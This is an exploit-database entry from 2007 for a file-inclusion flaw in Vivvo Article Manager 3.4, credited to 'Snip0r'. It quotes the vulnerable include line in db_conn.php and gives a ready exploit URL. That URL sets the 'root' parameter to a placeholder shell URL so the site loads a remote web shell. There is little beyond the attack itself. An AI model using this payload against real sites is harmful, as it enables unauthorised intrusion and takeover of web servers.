Vivvo Article Manager 3.4 (root) Local File Inclusion Vulnerability

2007-02-16T00:00:00
ID 1337DAY-ID-1514
Type zdt
Reporter Snip0r
Modified 2007-02-16T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
Vivvo Article Manager 3.4 (root) Local File Inclusion Vulnerability
===================================================================



===================================================================================================
Author: Snip0r
Script Name: Vivvo Article Manager v 3.4
Website: www.vivvo.net
===================================================================================================
Codesnippet of vulnerable script ("./include/db_conn.php"):

if (file_exists($ext_base_conf_file)) include_once($ext_base_conf_file);
===================================================================================================
Exploit:

http://victim.com/ [Vivvo Article Manager Path] / include / db_conn.php?root=[SHELL_URL]?
===================================================================================================




#  0day.today [2018-01-03]  #